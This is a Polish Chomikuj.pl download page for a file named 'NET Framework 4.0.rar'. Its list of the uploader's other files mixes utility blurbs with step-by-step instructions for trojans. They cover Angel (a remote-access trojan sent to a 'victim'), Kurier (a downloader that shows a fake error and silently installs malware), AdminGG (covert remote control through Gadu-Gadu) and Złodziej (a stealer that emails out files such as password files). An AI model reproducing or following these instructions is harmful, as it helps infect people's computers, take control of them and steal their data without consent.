Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

NET Framework 4.0.rar

penio2222 / Systemy Operacyjne / Windows / NET Framework / NET Framework 4.0.rar
Download: NET Framework 4.0.rar

0,75 MB

0.0 / 5 (0 głosów)

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Jeśli nie posiadasz SP3 (XP), tutaj znajdziesz dodatki do .NET Framework 4.0, bez nich go nie zainstalujesz.
obrazek Acronis Disk Director Home v11.0.216 Final łączy najpopularniejsze funkcje zarządzania dyskiem w jednym programie: * Menedżer partycji : Zmienia wielkość, kopiuje i przenosi partycje bez gubienia danych * Menedżer inicjujący : Umożliwia rozruch i tworzy wielostartowe środowisko; * Edytor dysku : Umożliwia ręczne redagowanie struktury dysku twardego; * Odzyskiwacz partycji : Odzyskuje zagubione lub usunięte partycje Wiele wiele innych funkcji. Jeden z najlepszych (o ile nie najlepszy) program do dysków. Znacznie szybszy o PartitonMagica. Obsługiwane systemy: Windows 98/Me/NT/NT Server/2000/2000 Server/2000 Advanced Server/XP/2003 Server.
Program do monitorowania dysku twardego. Pokazuje jego S.M.A.R.T, temperaturę, i inne rzeczy.
Czy zdarza ci się, że znalazłeś fajną grę, ale nie możesz jej uruchomić na swoim komputerze, bo jest "za słaby", i gra się zacina??? Mam dla ciebie idealne rozwiązanie!!! "Game Booster v2.2 PL" przyśpieszy twój komputer wyłączając usługi i zbędne programy na czas gry!!!
Świetny program do przyśpieszania komputera. Zawiera także takie narzędzia, jak: - Czyszczenie dysku - usuwa z dysku wszystkie "śmiecie" - Defragmentacja dysku - Defragmentuje dysk, przenosząc pliki systemowe na początek dysku, co przyśpiesza uruchomienie komputera, oraz potrafi pliki "podosuwać", aby zapobiec dalszej fragmentacji plików" - Naprawianie błędów - naprawia błędy powstałe podczas nietypowego użytkowania dysku(potrząsanie, uderzanie itp.) - Usuwanie duplikatów - Usuwa zdublowane pliki - Przeglądanie dysku - Przeglądnij pliki na dysku, dowiedz się ile zajmują miejsca, i uwolnij to miejsce!!! - Menadżer Autostartu - Optymalizacja Usług - Odinstalowywanie niepotrzebnych programów - Optymalizacja systemu - Przywracanie plików - pozwala przywrócić, nawet już dawno usunięte pliki!!! - Naprawa rejestru - usuwa błędy w rejestrze spowalniające system - Odblokowywanie plików - Chciałeś usunąć jakiś plik ale otrzymałeś komunikat, że jest on używany przez inną osobę lub program??? Albo rzeczywiście tak jest, albo plik został zablokowany. To narzędzie pomoże ci odblokować taki plik - Usuń historię - usuwa ślady obecności na komputerze - ... i dużo więcej ;-)
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Angel 1.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Angel 1.2.exe, bezpieczny serwer.exe, Serwer.exe 3. Plik Serwer.exe wysyłamy do naszej ofiary. Tego pliku nie wolno otwierać, bo by się trojan zagnieździł w naszym systemie, a tego byśmy przecież nie chcieli :) 4. Następnie odpalamy u siebie plik Angel 1.2.exe. Uruchamia się program w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz. Gdybyś chciał przetestować tego trojana na własnym kompie to: 1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :) 2. Na razie nie zamykasz tego programu, tylko otwierasz plik Angel 1.2.exe w którym podajesz swój adres IP i klikasz na połącz. 3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client (czyli Angel 1.2.exe) na własnym kompie. PS: Oczywiście plik bezpieczny serwer.exe służy tylko i wyłącznie do testowania trojana na własnym kompie. Do swojej ofiary musisz wysłać plik serwer.exe.
Obsługa programu: 1. Program dostarcza i uruchamia niebezpieczne aplikacje na kompie ofiary. Jest to trojan typu downloader, czyli taki w którym kiedy ofiara otworzy u siebie trojana, którego jej wysłaliśmy to ten ściągnie na jej dysk wskazany przez nas syf np. wirusy, robaki czy inne trojany. 2. Ściągamy skompresowany plik o nazwie Kurier v.1.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Otwieramy u siebie plik o nazwie kurier v1.0.exe Za jego pomocą stworzymy naszego trojana. 5. Uzupełniasz wszystkie trzy okienka i klikasz na Generuj. Powstaje plik trojan, mający rozmiar około 40KB, którego nie wolno otwierać bo syf zrobiłby się u nas, a tego byśmy przecież nie chcieli ;] 6. Teraz ten plik (trojana) którego stworzyłeś wysyłasz do swojej ofiary. 7. Jeżeli ofiara uruchomi naszego "kuriera", wyświetli się jej okno błędu np. "Plik uszkodzony!", program automatycznie pobierze z Internetu (z podanego mu linku) niebezpieczną aplikację i ją uruchomi bez wiedzy ofiary.
Obsługa programu: 1. Zakładamy numer Gadu-Gadu. Aby założyć numer GG, musimy uruchomić komunikator Gadu-Gadu, a następnie, z menu wybrać Użytkownik -> Nowy. Po założeniu numeru, zapisz sobie nowy numer, oraz hasło do niego. 2. Ściągamy skompresowany plik o nazwie AdminGG.zip Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: AdminGG.exe 3. Uruchamiamy program Admin GG. W polu oznaczonym jako "numer gg" wpisujemy numer Gadu-Gadu, który wcześniej założyliśmy (patrz punkt 1), a w polu "hasło gg" hasło do tego numeru. Następnie klikamy na przycisk "Kompiluj", oraz wskazujemy miejsce gdzie ma zostać zapisany skonfigurowany przed chwilą plik. 4. Plik, który przed chwilą skonfigurowałeś uruchamiasz na komputerze, którym chcesz sterować. Np. Jeśli zamierzasz sterować komputerem kolegi, wysyłasz mu ten plik np. na emaila lub dajesz na dyskietce. Żeby program działał, kolega musi uruchomić ten plik na swoim komputerze. Następnie do swojej listy kontaktów, dodajesz numer, który założyłeś (punkt 1) i który posłużył ci do konfiguracji pliku, który wysłałeś do kolegi. Jeśli kolega uruchomił plik na swoim komputerze, numer który dodałeś do listy będzie miał status "Dostępny", w czasie gdy kolega będzie miał włączony komputer. Plik uruchomiony na komputerze kolegi, będzie się automatycznie włączał przy starcie systemu Windows. Uwaga! Nie możesz dać kilku osobom jednego, tego samego skonfigurowanego pliku! Dzieje się tak, ponieważ plik używa numeru Gadu-Gadu, który podałeś przy konfiguracji pliku. Jeden skonfigurowany plik może działać tylko na jednym komputerze. Gdy chcemy wysłać plik kilku osobom, należy dla każdej z nich skonfigurować osobny plik, każdy z nowym numerem Gadu-Gadu. 5. Jeśli wykonałeś poprawnie wszystkie instrukcje zawarte w punktach 1, 2, 3, 4 możesz rozpocząć sterowanie komputerem osoby, która uruchomiła skonfigurowany plik, np. kolega. Sterowanie odbywa się przez wysyłanie odpowiednich komend, na numer, który zapisałeś na liście kontaktów zgodnie z punktem czwartym. Lista komend: opencd - wysuwa tackę CD-ROM closecd - wsuwa tackę CD-ROM spo - wyłącza monitor turnscr - odwraca obraz na monitorze "do góry nogami" pulpithide - ukrywa ikony na pulpicie, tym samym go blokując pulpitshow - pokazuje ikony na pulpicie timehide - ukrywa zegarek systemowy timeshow - pokazuje zegarek systemowy shutdown - wyłącza komputer open "adres_strony" - uruchamia dowolną stronę internetową w domyślnej przeglądarce msg "tresc_komunikatu" - pokazuje komunikat o dowolnej treści np. "msg Mam cię!" help - pokazuje spis komend. 6. Komendy można wysyłać na odpowiedni numer jedynie wtedy, gdy jest on Dostępny na liście kontaktów. 7. Jeśli to wszystko przeczytałeś to brawo :)
Obsługa programu: 1. Program złodziej służy do wykradania plików (małych) 2. Ściągamy skompresowany plik o nazwie Złodziej.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 4. Odpalamy plik o nazwie "konfigurator.exe." 5. W konfiguratorze podajemy e-mail na który ma zostać wysłany plik i lokacje pliku np: gdy chcemy ściągnąć od kogoś plik to podajemy swój e-mail i dowiadujemy się gdzie znajduje się plik który chcemy ściągnąć.Jeżeli ktoś np: posiada plik haslo.txt to musimy się dowiedzieć gdzie go trzyma np: C:\haslo.txt wpisujemy to w lokacje! WPISYWAĆ DOKŁADNIE! Klikamy Generuj. Powstaje Plik.exe (czyli trojan), możemy zmienić nazwę, ikonę i wysyłać ofiarze. 6.PLIK JEST NIEGROŹNY!!! po odpaleniu trojana wyskakuje fałszywy błąd: ERROR 615632187x Nie znaleziono taskmgr.dll który ma wprowadzić w błąd. Program wysyła podany plik z lokacji na e-mail i się wyłącza...
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności